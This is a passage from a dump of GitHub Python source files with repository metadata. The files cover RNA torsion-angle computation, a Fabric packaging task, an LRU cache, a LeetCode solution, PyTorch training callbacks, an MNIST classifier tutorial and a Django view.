df\n","repo_name":"coperyan/python-modules","sub_path":"modules/pandas/df.py","file_name":"df.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3259045565","text":" # -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 18 16:52:10 2019\n\n@author: jacqu\n\nComputing angles for backbone and base, for 1 nt \n\nNew version : all angles + proper computation \n\"\"\"\n\nimport numpy as np\nimport itertools\nimport pickle \nimport os \nimport networkx as nx\nfrom rna_classes import *\n\nimport sys\nif __name__ == \"__main__\":\n script_dir = os.path.dirname(os.path.realpath(__file__))\n sys.path.append(os.path.join(script_dir, '..'))\n\n from utils import *\n \ndef norm(vec):\n # Norms a vector\n return vec / np.linalg.norm(vec)\n\ndef ortho(vec,ref):\n # Returns orthogonal component of vec to ref \n # ! Ref should already be a normed vector\n \"\"\"\n if(np.abs(np.linalg.norm(ref)-1)>0.001): # Ref is not a normed vector : norm it \n ref = norm(ref)\n \"\"\"\n vprime = vec - ref * np.dot(vec,ref)\n return vprime/np.linalg.norm(vprime)\n \ndef angle(ba,bc):\n \"\"\" radians angle between two unnormed vectors (numpy array, shape (3,))\"\"\"\n cosine_angle = np.dot(ba, bc) / (np.linalg.norm(ba) * np.linalg.norm(bc))\n angle = np.arccos(cosine_angle)\n\n return angle\n\ndef torsion(a,b,c,d, unit = 'rad'):\n # Torsion angle between bonds ab and cd , around axis bc. \n # Input are atoms from rna classes format (a.x, a.y, a.z coordinates)\n \n # norm bc : \n bc = float(c.x)-float(b.x), float(c.y)-float(b.y), float(c.z)-float(b.z)\n bc = norm(bc)\n \n # vectors ba and cd : \n ba = float(a.x)-float(b.x), float(a.y)-float(b.y), float(a.z)-float(b.z)\n cd = float(d.x)-float(c.x), float(d.y)-float(c.y), float(d.z)-float(c.z)\n \n # Orthogonal components of ba and cd wrt. axis bc : \n ba_O = ortho(ba, bc)\n cd_O = ortho(cd, bc)\n \n # Compute angle and sign\n angle_rad = np.arccos(np.dot(ba_O, cd_O)) \n sign = np.dot(np.cross(ba_O, cd_O), bc) \n if (sign < 0):\n angle_rad = -angle_rad\n \n # Output in desired unit \n if(unit=='deg'):\n return angle_rad *180 /np.pi\n else:\n return angle_rad\n\ndef center(atoms):\n \"\"\" Computes center of mass given atoms of a base and returns coordinates as tuple (x,y,z)\"\"\"\n base_atoms = {'N1', 'C2', 'N3', 'C4', 'C5','C6','O2', 'O4', 'N4'} # pyrimidine atoms \n base_atoms.update({'N2', 'O6', 'N6', 'N7','C8', 'N9'}) # purine specific ones \n cx,cy,cz = 0,0,0\n cpt =0\n for a in atoms : \n if(a.atom_label in base_atoms):\n cx += float(a.x)\n cy += float(a.y)\n cz += float(a.z)\n cpt+=1\n if(cpt >0):\n return (cx/cpt, cy/cpt, cz/cpt)\n else:\n return (0,0,0)\n\ndef base_angles(nucleotide, nt_prev=None, nt_next=None):\n \"\"\"\n Takes a nucleotide object and returns defined angles values. unit = 'rad' or 'deg'.\n Out type : tuple \n \n TODO:\n alpha: O3'(i-1)-P-O5'-C5'\n beta: P-O5'-C5'-C4'\n gamma: O5'-C5'-C4'-C3'\n delta: C5'-C4'-C3'-O3'\n epsilon: C4'-C3'-O3'-P(i+1)\n zeta: C3'-O3'-P(i+1)-O5'(i+1)\n chi : glyc bond torsion\n base_gly : angle btw gly bond and base vector (NG, G is base geom center)\n \n \"\"\"\n \n # Set all angles to zero by default (will be used as error marker)\n alpha, beta, gamma, delta, epsilon, zeta, chi, base_gly = [0.0 for i in range(8)]\n \n # 1/ Angles with only current nucleotide \n atoms=nucleotide.atoms\n for a in atoms : \n if a.atom_label ==\"C1'\":\n c1p = a \n elif a.atom_label ==\"C3'\":\n c3p = a \n elif a.atom_label ==\"O3'\":\n o3p = a \n elif a.atom_label == \"O4'\":\n o4p=a\n elif a.atom_label ==\"C4'\":\n c4p = a \n elif a.atom_label ==\"C5'\":\n c5p = a\n elif a.atom_label ==\"O5'\":\n o5p = a \n elif a.atom_label ==\"P\":\n P = a\n \n if (nucleotide.nt in ('G','A')): # Purine, chi = O4'-C1' // N9-C4\n \n n_base = [a for a in atoms if a.atom_label ==\"N9\"]\n c_base = [a for a in atoms if a.atom_label=='C4']\n \n if len(n_base)==1:\n n_base = n_base[0]\n if len(c_base)==1:\n c_base = c_base[0]\n \n elif (nucleotide.nt in ('U','C')): #Pyrimidine , chi = O4'-C1' // N1-C2\n \n n_base = [a for a in atoms if a.atom_label ==\"N1\"]\n c_base = [a for a in atoms if a.atom_label=='C2']\n \n if len(n_base)==1:\n n_base = n_base[0]\n if len(c_base)==1:\n c_base = c_base[0]\n \n #beta: P-O5'-C5'-C4'\n try:\n beta = torsion (P, o5p, c5p, c4p)\n except:\n pass\n \n #gamma: O5'-C5'-C4'-C3'\n try:\n gamma = torsion(o5p, c5p, c4p, c3p)\n except:\n pass\n \n # Delta : C5'-C4'-C3'-O3'\n try:\n delta = torsion(c5p, c4p, c3p, o3p)\n except:\n pass\n \n # Chi torsion angle : O4p C1p Nbase Cbase\n try:\n chi = torsion(o4p, c1p, n_base, c_base)\n except:\n pass\n \n # Angle btw glycosidic bond (NC1') and base (NG, G center of base)\n try:\n #vector NC1'\n u = [float(c1p.x)-float(n_base.x), float(c1p.y)-float(n_base.y), float(c1p.z)-float(n_base.z) ]\n #vector NG\n gx, gy, gz = center(atoms)\n v=[float(gx)-float(n_base.x), float(gy)-float(n_base.y), float(gz)-float(n_base.z)]\n base_gly = angle(u, v)\n except:\n pass\n \n # 2/ Prev nucleotide\n alpha = 0 # error (default)\n if(nt_prev !=None):\n atoms = nt_prev.atoms\n o3p_prev = [a for a in atoms if a.atom_label ==\"O3'\"]\n \n if(len(o3p_prev)==1):\n o3p_prev=o3p_prev[0]\n # alpha: O3'(i-1)-P-O5'-C5'\n try:\n alpha = torsion(o3p_prev, P, o5p, c5p)\n except:\n pass\n \n #3 / next nucleotide \n epsilon, zeta = 0,0\n if(nt_next !=None):\n atoms = nt_next.atoms\n o5p_next = [a for a in atoms if a.atom_label ==\"O5'\"]\n P_next = [a for a in atoms if a.atom_label ==\"P\"]\n \n if len(P_next)==1:\n P_next = P_next[0]\n #epsilon: C4'-C3'-O3'-P(i+1)\n try:\n epsilon = torsion(c4p, c3p, o3p, P_next)\n except:\n pass\n \n if len(o5p_next)==1:\n o5p_next = o5p_next[0]\n #zeta: C3'-O3'-P(i+1)-O5'(i+1)\n try:\n zeta = torsion(c3p, o3p, P_next, o5p_next)\n except:\n pass\n \n return [alpha, beta, gamma, delta, epsilon, zeta, chi, base_gly] # 8 angles output \n\ndef norm_base_angles(nucleotide):\n # Computes angles phi, psi of the normal vector to the base plane \n atoms = nucleotide.atoms\n # center G \n gx, gy, gz = center(atoms)\n if((gx,gy,gz)==(0,0,0)):\n return 0,0\n \n if (nucleotide.nt in ('G','A')): # Purine, chi = O4'-C1' // N9-C4\n \n n_base = [a for a in atoms if a.atom_label ==\"N9\"]\n \n if len(n_base)==1:\n n_base = n_base[0]\n \n elif (nucleotide.nt in ('U','C')): #Pyrimidine , chi = O4'-C1' // N1-C2\n \n n_base = [a for a in atoms if a.atom_label ==\"N1\"]\n \n if len(n_base)==1:\n n_base = n_base[0]\n \n c5 = [a for a in atoms if a.atom_label ==\"C5\"]\n if(len(c5)>0):\n c5 = c5[0]\n \n try:\n # vector G-N\n u = -1*np.array([float(gx)-float(n_base.x), float(gy)-float(n_base.y), float(gz)-float(n_base.z) ])\n # vector G-C5 \n v = -1*np.array([float(c5.x)-float(n_base.x), float(c5.y)-float(n_base.y), float(c5.z)-float(n_base.z) ])\n \n # normal vec \n n = np.cross(u,v)\n n=norm(n)\n except:\n return 0,0\n \n r=np.sqrt(n[0]**2+n[1]**2+n[2]**2)\n # radial coordinates angles \n phi = np.arctan(n[1]/n[0])\n theta = np.arccos(n[2]/r)\n \n return theta, phi\n \n \nif __name__=='__main__':\n \n # Load a sample graph \n gr_dir = \"C:/Users/jacqu/Documents/MegaSync Downloads/RNA_graphs\"\n graphs = os.listdir(gr_dir)\n pid=graphs[0]\n g=pickle.load(open(os.path.join(gr_dir,pid), 'rb'))\n \n for node, data in g.nodes(data=True):\n \n nucleotide = data['nucleotide']\n print('node id ', node[1])\n print('pdb position : ', nucleotide.pdb_pos)\n \n print('nt angles: ')\n print(norm_base_angles(nucleotide))\n\n \n\n \n \n\n\n","repo_name":"jacquesboitreaud/rna_ne","sub_path":"data_processing/angles.py","file_name":"angles.py","file_ext":"py","file_size_in_byte":8392,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"14935146656","text":"#!/usr/bin/python3\n\nfrom fabric.api import local\nfrom datetime import datetime\n\n\ndef do_pack():\n \"\"\"This will create a package with web_static\"\"\"\n local(\"sudo mkdir -p versions\")\n date = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n compressed = (\"versions/web_static_{}.tgz\".format(date))\n local(\"sudo tar -cvzf {} web_static\".format(compressed))\n return compressed\n","repo_name":"fruizga/AirBnB_clone_v2","sub_path":"1-pack_web_static.py","file_name":"1-pack_web_static.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75060116519","text":"#This class implements a CPU cache as outlined in the project promt, includng a replacement policy of LRU (least recently used). \n\n\nimport collections\n\ncache_size = 16\n\nclass Cache:\n\n def __init__(self):\n self.cache = collections.OrderedDict()\n \n # By removing and reinserting the value to the cache, we keep track of how recently information has been used. \n def search_cache(self, address):\n if address in self.cache:\n value = self.cache.pop(address)\n self.cache[address] = value\n return value\n else:\n return None \n \n #Replacement policy- if the cache is ful, we remove the oldest item (FIFO/LRU)\n def write_cache(self, address, value):\n if len(self.cache) > cache_size:\n self.cache.popitem(last=False)\n self.cache[address] = value\n ","repo_name":"phyxphysio/cpu_simulator","sub_path":"cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14025410181","text":"class Solution:\n def mostPopularCreator(self, creators: List[str], ids: List[str], views: List[int]) -> List[List[str]]:\n return self.optimise(creators, ids, views)\n \n def optimise(self, creators, ids, views):\n '''\n Time Complexity: O(N)\n Space Complexity: O(N)\n '''\n d = defaultdict(list)\n ln = len(ids)\n ret = []\n \n for i in range(ln):\n d[creators[i]].append((ids[i], views[i]))\n \n maxi = {}\n for k, v in d.items():\n maxi[k] = sum([i[1] for i in v])\n \n max_views = max(maxi.values())\n for k, v in maxi.items():\n if v == max_views:\n max_ = max([i[1] for i in d[k]])\n min_ = min([i[0] for i in d[k] if i[1] == max_])\n ret.append([k, min_])\n \n return ret\n \n def solve(self, creators, ids, views):\n '''\n Time Complexity: O(N)\n Space Complexity: O(N)\n '''\n maxis = defaultdict(int)\n cnt = defaultdict(int)\n minis = {}\n \n ln = len(creators)\n \n for i in range(ln):\n maxis[creators[i]] = max(maxis[creators[i]], views[i])\n cnt[creators[i]] += views[i]\n\n max_views = max(cnt.values())\n for i in range(ln):\n if cnt[creators[i]] == max_views and maxis[creators[i]] == views[i]:\n if creators[i] in minis:\n minis[creators[i]] = min(minis[creators[i]], ids[i])\n else:\n minis[creators[i]] = ids[i]\n \n ret = []\n for k, v in cnt.items():\n if v == max_views:\n ret.append([k, minis[k]])\n \n return ret\n ","repo_name":"prashanthr11/Leetcode_solutions","sub_path":"2456-most-popular-video-creator/2456-most-popular-video-creator.py","file_name":"2456-most-popular-video-creator.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23148209020","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n# File: stats.py\n# Author: Tomás Vírseda\n# License: GPL v3\n# Description: Manage MiAZ stats\n\"\"\"\n\nfrom gettext import gettext as _\n\nfrom gi.repository import GObject\n\nfrom MiAZ.backend.env import ENV\nfrom MiAZ.backend.log import get_logger\nfrom MiAZ.backend.models import Group, Person, Country\nfrom MiAZ.backend.models import Purpose, Concept, SentBy\nfrom MiAZ.backend.models import SentTo, Date, Extension\n\nFields = {}\nFields[Date] = 0\nFields[Country] = 1\nFields[Group] = 2\nFields[SentBy] = 3\nFields[Purpose] = 4\nFields[Concept] = 5\nFields[SentTo] = 6\n\n\nclass MiAZStats(GObject.GObject):\n __gtype_name__ = 'MiAZStats'\n __gsignals__ = {\n \"stats-updated\": (GObject.SignalFlags.RUN_LAST, None, ()),\n }\n stats = {}\n\n def __init__(self, backend):\n super(MiAZStats, self).__init__()\n self.backend = backend\n self.log = get_logger('MiAZStats')\n self.util = self.backend.util\n\n def _build(self, *args):\n self.stats = {}\n self.stats[_(Date.__title__)] = {}\n self.stats[_(Date.__title__)][_('year')] = {}\n self.stats[_(Date.__title__)][_('month')] = {}\n self.stats[_(Date.__title__)][_('day')] = {}\n self.stats[_(Country.__title__)] = {}\n self.stats[_(Group.__title__)] = {}\n self.stats[_(SentBy.__title__)] = {}\n self.stats[_(Purpose.__title__)] = {}\n self.stats[_(SentTo.__title__)] = {}\n\n for document in self.util.get_files():\n fields = self.util.get_fields(document)\n\n # Date\n adate = self.util.string_to_datetime(fields[0])\n year = str(adate.year)\n month = '%s%02d' % (year, adate.month)\n day = '%s%02d' % (month, adate.day)\n\n try:\n self.stats[_(Date.__title__)][_('year')][year] += 1\n except KeyError:\n self.stats[_(Date.__title__)][_('year')][year] = 1\n\n try:\n self.stats[_(Date.__title__)][_('month')][month] += 1\n except KeyError:\n self.stats[_(Date.__title__)][_('month')][month] = 1\n\n try:\n self.stats[_(Date.__title__)][_('day')][day] += 1\n except KeyError:\n self.stats[_(Date.__title__)][_('day')][day] = 1\n\n # Rest of metadata\n for prop in [Country, Group, SentBy, Purpose, SentTo]:\n item = fields[Fields[prop]]\n try:\n self.stats[_(prop.__title__)][item] += 1\n except KeyError:\n self.stats[_(prop.__title__)][item] = 1\n\n self.log.debug(\"Stats updated\")\n self.emit('stats-updated')\n\n def get(self):\n self._build()\n return self.stats\n\n","repo_name":"t00m/MiAZ","sub_path":"MiAZ/backend/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74873854120","text":"from os.path import join, exists\nimport csv\n\nimport numpy as np\nimport torch\n\n\nclass Callback(object):\n\n def on_train_init(self, model, **kwargs):\n pass\n\n def on_train_fi(self, model, **kwargs):\n pass\n\n def on_epoch_init(self, model, epoch, **kwargs):\n pass\n\n def on_epoch_fi(self, logs_dict, model, epoch, **kwargs):\n pass\n\n def on_step_init(self, logs_dict, model, epoch, **kwargs):\n pass\n\n def on_step_fi(self, logs_dict, model, epoch,**kwargs):\n pass\n\n\nclass History(Callback):\n\n def __init__(self, keys=None):\n self.logs = {}\n\n if keys is None:\n self.keys = []\n else:\n self.keys = keys\n\n def on_train_init(self, model, **kwargs):\n self.logs['Train'] = {}\n self.logs['Validation'] = {}\n\n\n def on_epoch_init(self, model, epoch, **kwargs):\n self.logs['Train'][epoch] = {}\n self.logs['Validation'][epoch] = {}\n\n\n for k in self.keys:\n self.logs['Train'][epoch][k] = []\n\n\n def on_step_fi(self, logs_dict, model, epoch, **kwargs):\n for k,v in logs_dict.items():\n self.logs['Train'][epoch][k].append(v)\n\n\n def on_epoch_fi(self, logs_dict, model, epoch, **kwargs):\n for k,v in logs_dict.items():\n self.logs['Validation'][epoch][k]=v\n\n\nclass ModelCheckpoint(Callback):\n\n def __init__(self, dirpath, save_model_frequency):\n\n self.dirpath = dirpath\n self.save_model_frequency = save_model_frequency\n\n def on_epoch_fi(self, logs_dict, model, epoch, **kwargs):\n\n optimizer = kwargs['optimizer']\n checkpoint = {\n 'epoch': epoch + 1,\n }\n if isinstance(model, dict):\n for model_name, model_instance in model.items():\n checkpoint['state_dict_' + model_name] = model_instance.state_dict()\n else:\n checkpoint['state_dict'] = model.state_dict()\n\n if isinstance(optimizer, dict):\n for optimizer_name, optimizer_instance in optimizer.items():\n checkpoint['optimizer_' + optimizer_name] = optimizer_instance.state_dict()\n else:\n checkpoint['optimizer'] = optimizer.state_dict()\n\n filepath = join(self.dirpath, 'model_checkpoint.LAST.pth')\n torch.save(checkpoint, filepath)\n if np.mod(epoch, self.save_model_frequency) == 0:\n filepath = join(self.dirpath, 'model_checkpoint.' + str(epoch) + '.pth')\n torch.save(checkpoint, filepath)\n\n\n def on_train_fi(self, model, **kwargs):\n checkpoint = {}\n if isinstance(model, dict):\n for model_name, model_instance in model.items():\n checkpoint['state_dict_' + model_name] = model_instance.state_dict()\n else:\n checkpoint['state_dict'] = model.state_dict()\n\n filepath = join(self.dirpath, 'model_checkpoint.FI.pth')\n torch.save(checkpoint, filepath)\n\n\nclass PrinterCallback(Callback):\n\n def __init__(self, keys=None):\n self.keys = keys\n self.logs = {}\n\n def on_train_init(self, model, **kwargs):\n print('######################################')\n print('########## Training started ##########')\n print('######################################')\n print('\\n')\n\n def on_epoch_init(self, model, epoch, **kwargs):\n print('------------- Epoch: ' + str(epoch))\n\n def on_step_fi(self, logs_dict, model, epoch, **kwargs):\n to_print = 'Iteration: (' + str(kwargs['iteration']) + '/' + str(kwargs['N']) + '). ' + \\\n ', '.join([k + ': ' + str(round(v, 3)) for k, v in logs_dict.items()])\n print(to_print)\n def on_epoch_fi(self, logs_dict, model, epoch, **kwargs):\n to_print = 'Epoch summary: ' + ','.join([k + ': ' + str(round(v, 3)) for k, v in logs_dict.items()])\n print(to_print)\n\n\n def on_train_fi(self, model, **kwargs):\n print('#######################################')\n print('########## Training finished ##########')\n print('#######################################')\n\n\nclass ToCSVCallback(Callback):\n\n def __init__(self, filepath, keys, attach=False):\n mode = 'a' if attach else 'w'\n fieldnames = ['Phase','epoch','iteration'] + keys\n write_header = True\n if exists(filepath) and attach:\n write_header = False\n csvfile = open(filepath, mode)\n self.csvwriter = csv.DictWriter(csvfile, fieldnames)\n\n if write_header:\n self.csvwriter.writeheader()\n\n\n\n def on_step_fi(self, logs_dict, model, epoch, **kwargs):\n write_dict = {**{'Phase': 'Train', 'epoch':epoch, 'iteration':kwargs['iteration']}, **logs_dict}\n self.csvwriter.writerow(write_dict)\n\n def on_epoch_fi(self, logs_dict, model, epoch, **kwargs):\n write_dict = {**{'Phase': 'Validation', 'epoch': epoch}, **logs_dict}\n self.csvwriter.writerow(write_dict)\n\n\nclass LRDecay(Callback):\n\n def __init__(self, optimizer, n_iter_start, n_iter_finish, lr_fi=0.75):\n self.optimizer = optimizer\n self.n_iter_start = n_iter_start\n self.n_iter_finish = n_iter_finish\n self.optimizer = optimizer\n self.lr_init = optimizer.param_groups[0]['lr']\n self.lr_fi = lr_fi\n\n def on_train_init(self, model, **kwargs):\n init_epoch = kwargs['starting_epoch'] if 'starting_epoch' in kwargs.keys() else 0\n if init_epoch >= self.n_iter_start:\n updated_lr = (1 - self.lr_fi * (init_epoch - self.n_iter_start)/(self.n_iter_finish-self.n_iter_start)) * self.lr_init\n updated_lr = max(updated_lr, self.lr_init*self.lr_fi)\n for param_group in self.optimizer.param_groups:\n param_group['lr'] = updated_lr\n\n def on_epoch_init(self, model, epoch, **kwargs):\n if epoch >= self.n_iter_start:\n updated_lr = (1 - self.lr_fi * (epoch - self.n_iter_start)/(self.n_iter_finish-self.n_iter_start)) * self.lr_init\n for param_group in self.optimizer.param_groups:\n param_group['lr'] = updated_lr\n\n\n\n","repo_name":"acasamitjana/SynthByReg","sub_path":"src/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"23331645334","text":"import glob\nimport os\nlist1=glob.glob('*.html')\n# print(list1)\n\n#with open('slides.qmd', 'r') as file:\nwith open('../slides.ipynb', 'r') as file:\n text = file.read() \n\nfor filename in list1: \n if filename not in text:\n print(\"not found (removing)\", filename)\n os. remove(filename)\n # else:\n # print(\"found\",filename)\n","repo_name":"5cminsuhlim/ANLY503","sub_path":"lecs/3.13/W08-2023-plotly/img/clean-up-images.py","file_name":"clean-up-images.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14169177321","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 9 10:11:58 2018\r\n\r\n@author: Student\r\n\"\"\"\r\n#selection sort\r\nL = [5,6,7,1,4,2,9,8,3]\r\n\r\n'''\r\nwhile(len(L) >0):\r\n minPos = 0\r\n minVal = L[minPos]\r\n for i in range(len(L)):\r\n if minVal > L[i]:\r\n minPos = i\r\n minVal = L[minPos]\r\n O.append(minVal) \r\n L.pop(minPos)\r\n '''\r\n#selection sort in memory\r\nstart = 0\r\nwhile start < len(L):\r\n minPos = start\r\n minVal = L[minPos]\r\n for i in range(start,len(L)):\r\n if minVal > L[i]:\r\n minPos = i\r\n minVal = L[minPos]\r\n L[start],L[minPos] = L[minPos],L[start]\r\n start += 1\r\n ","repo_name":"fordzii/60021346","sub_path":"inclassroom/test_IDE_spyder3.py","file_name":"test_IDE_spyder3.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32273167839","text":"import sys\nimport sklearn\n\nimport numpy as np\nimport os\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.model_selection import cross_val_score, StratifiedKFold, cross_val_predict\nfrom sklearn.base import clone, BaseEstimator\nfrom sklearn.metrics import confusion_matrix, precision_score, recall_score, f1_score, precision_recall_curve\nfrom sklearn.svm import SVC\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.preprocessing import StandardScaler\n\nnp.random.seed(42)\n\nmpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"classification\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\nos.makedirs(IMAGES_PATH, exist_ok=True)\n\n\ndef save_fig(fig_id, tight_layout=True, fig_extension=\"png\", resolution=300):\n path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n print(\"Saving figure\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=fig_extension, dpi=resolution)\n\n\nmnist = fetch_openml('mnist_784', version=1)\nprint(mnist.keys())\n\nX, y = mnist[\"data\"], mnist[\"target\"]\nprint(X.shape)\nprint(y.shape)\n\nsome_digit = X[0]\nsome_digit_image = some_digit.reshape(28, 28)\nplt.imshow(some_digit_image, cmap=mpl.cm.binary)\nplt.axis(\"off\")\n\nsave_fig(\"some_digit_plot\")\nplt.show()\n\n# casting the Y value into an int as the np array returns the value as a string\ny = y.astype(np.uint8)\n\n\ndef plot_digits(data):\n image = data.reshape(28 * 28)\n plt.imshow(image, cmap=mpl.cm.binary\n , interpolation=\"nearest\")\n plt.axis = \"off\"\n\n\ndef plot_digits(instances, images_per_row=10, **options):\n size = 28\n images_per_row = min(len(instances), images_per_row)\n images = [instance.reshape(size, size) for instance in instances]\n n_rows = (len(instances) - 1) // images_per_row + 1\n row_images = []\n n_empty = n_rows * images_per_row - len(instances)\n images.append(np.zeros((size, size * n_empty)))\n for row in range(n_rows):\n rimages = images[row * images_per_row:(row + 1) * images_per_row]\n row_images.append(np.concatenate(rimages, axis=1))\n image = np.concatenate(row_images, axis=0)\n plt.imshow(image, cmap=mpl.cm.binary, **options)\n plt.axis(\"off\")\n\n\nplt.figure(figsize=(9, 9))\nexample_images = X[:100]\nplot_digits(example_images, images_per_row=10)\nsave_fig(\"more_digits_plot\")\nplt.show()\n\nX_train, X_test, y_train, y_test = X[:60000], X[60000:], y[:60000], y[60000:]\n\ny_train_5 = (y_train == 5)\ny_test_5 = (y_test == 5)\n\nsgd_clf = SGDClassifier(max_iter=1000, tol=1e-3, random_state=42)\nsgd_clf.fit(X_train, y_train_5)\n\nsgd_clf.predict([some_digit])\n\ncross_val_score(sgd_clf, X_train, y_train_5, cv=3, scoring=\"accuracy\")\n\nskfolds = StratifiedKFold(n_splits=3, random_state=42)\n\nfor train_index, test_index in skfolds.split(X_train, y_train_5):\n clone_clf = clone(sgd_clf)\n X_train_folds = X_train[train_index]\n y_train_folds = y_train_5[train_index]\n X_test_folds = X_train[test_index]\n y_test_folds = y_train_5[test_index]\n\n clone_clf.fit(X_train_folds, y_train_folds)\n y_pred = clone_clf.predict(X_test_folds)\n n_correct = sum(y_pred == y_test_folds)\n print(n_correct / len(y_pred))\n\n\nclass Never5Classifier(BaseEstimator):\n def fit(self, X, y=None):\n pass\n\n def predict(self, X):\n return np.zeros((len(X), 1), dtype=bool)\n\n\nnever_5_classifier = Never5Classifier()\nprint(cross_val_score(never_5_classifier, X_train, y_train_5, cv=3, scoring=\"accuracy\"))\n\ny_train_pred = cross_val_predict(sgd_clf, X_train, y_train_5, cv=3)\n\nprint(confusion_matrix(y_train_5, y_train_pred))\n\ny_train_perfect_predictions = y_train_5\nprint(confusion_matrix(y_train_5, y_train_perfect_predictions))\nprint(precision_score(y_train_5, y_train_pred))\nprint(recall_score(y_train_5, y_train_pred))\nprint(f1_score(y_train_5, y_train_pred))\ny_scores = sgd_clf.decision_function([some_digit])\nprint(y_scores)\nthreshold = 0\ny_some_digit_pred = (y_scores > threshold)\nprint(y_some_digit_pred)\nthreshold = 8000\ny_some_digit_pred = (y_scores > threshold)\nprint(y_some_digit_pred)\n\ny_scores = cross_val_predict(sgd_clf, X_train, y_train_5, cv=3, method=\"decision_function\")\n\nprecisions, recalls, thresholds = precision_recall_curve(y_train_5, y_scores)\n\n\ndef plot_precision_recall_vs_threshold(precisions, recalls, thresholds):\n plt.plot(thresholds, precisions[:-1], \"b--\", label=\"Precision\", linewidth=2)\n plt.plot(thresholds, recalls[:-1], \"g-\", label=\"Recall\", linewidth=2)\n plt.legend(loc=\"center right\", fontsize=16) # Not shown in the book\n plt.xlabel(\"Threshold\", fontsize=16) # Not shown\n plt.grid(True) # Not shown\n plt.axis([-50000, 50000, 0, 1]) # Not shown\n\n\nrecall_90_precision = recalls[np.argmax(precisions >= 0.90)]\nthreshold_90_precision = thresholds[np.argmax(precisions >= 0.90)]\n\nplt.figure(figsize=(8, 4)) # Not shown\nplot_precision_recall_vs_threshold(precisions, recalls, thresholds)\nplt.plot([threshold_90_precision, threshold_90_precision], [0., 0.9], \"r:\") # Not shown\nplt.plot([-50000, threshold_90_precision], [0.9, 0.9], \"r:\") # Not shown\nplt.plot([-50000, threshold_90_precision], [recall_90_precision, recall_90_precision], \"r:\") # Not shown\nplt.plot([threshold_90_precision], [0.9], \"ro\") # Not shown\nplt.plot([threshold_90_precision], [recall_90_precision], \"ro\") # Not shown\nsave_fig(\"precision_recall_vs_threshold_plot\") # Not shown\nplt.show()\n\nprint((y_train_pred == (y_scores > 0)).all())\n\n\ndef plot_precision_vs_recall(precisions, recalls):\n plt.plot(recalls, precisions, \"b-\", linewidth=2)\n plt.xlabel(\"Recall\", fontsize=16)\n plt.ylabel(\"Precision\", fontsize=16)\n plt.axis([0, 1, 0, 1])\n plt.grid(True)\n\n\nplt.figure(figsize=(8, 6))\nplot_precision_vs_recall(precisions, recalls)\nplt.plot([0.4368, 0.4368], [0., 0.9], \"r:\")\nplt.plot([0.0, 0.4368], [0.9, 0.9], \"r:\")\nplt.plot([0.4368], [0.9], \"ro\")\nsave_fig(\"precision_vs_recall_plot\")\nplt.show()\n\nsvm_clf = SVC(gamma=\"auto\", random_state=42)\nsvm_clf.fit(X_train[:1000], y_train[:1000])\nsvm_clf.predict([some_digit])\n\nsome_digit_score = svm_clf.decision_function([some_digit])\nprint(some_digit_score)\nprint(np.argmax(some_digit_score))\nprint(svm_clf.classes_)\nprint(svm_clf.classes_[5])\n\novr_clf = OneVsRestClassifier(SVC(gamma=\"auto\", random_state=42))\novr_clf.fit(X_train[:1000], y_train[:1000])\novr_clf.predict([some_digit])\nprint(len(ovr_clf.estimators_))\nsgd_clf.fit(X_train, y_train)\nprint(sgd_clf.predict([some_digit]))\nprint(sgd_clf.decision_function([some_digit]))\n\ncross_val_score(sgd_clf, X_train, y_train, cv=3, scoring=\"accuracy\")\nscaler = StandardScaler()\nX_train_scaled = scaler.fit_transform(X_train.astype(np.float64))\ncross_val_score(sgd_clf, X_train_scaled, y_train, cv=3, scoring=\"accuracy\")\n\ny_train_pred = cross_val_predict(sgd_clf, X_train_scaled, y_train, cv=3)\nconf_mx = confusion_matrix(y_train, y_train_pred)\nprint(conf_mx)\n\nplt.matshow(conf_mx, cmap=plt.cm.gray)\nsave_fig(\"confusion_matrix_plot\", tight_layout=False)\nplt.show()","repo_name":"toushi100/Tensorfow-in-Practice","sub_path":"chapter 2 classification.py","file_name":"chapter 2 classification.py","file_ext":"py","file_size_in_byte":7128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3120190620","text":"from django.shortcuts import render\nfrom datetime import datetime\n# Create your views here.\n\ndef index(request,name):\n now = datetime.now()\n context = {\n \"name\":name.capitalize(),\n \"isIndependence\": now.month==8 and now.day==14\n }\n return 